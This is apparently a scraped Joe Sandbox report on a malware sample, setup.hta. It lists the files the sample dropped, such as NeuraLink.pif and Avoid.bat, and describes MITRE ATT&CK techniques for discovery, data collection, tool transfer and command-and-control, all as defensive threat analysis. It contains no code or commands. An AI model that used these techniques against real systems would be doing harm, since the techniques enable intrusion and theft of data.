Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report setup.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\NeuraConnect Technologies\B

C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.js

C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.pif

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\m

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Ada

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Avoid

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Avoid.bat (copy)

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Conf

Windows Analysis Report
setup.hta

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre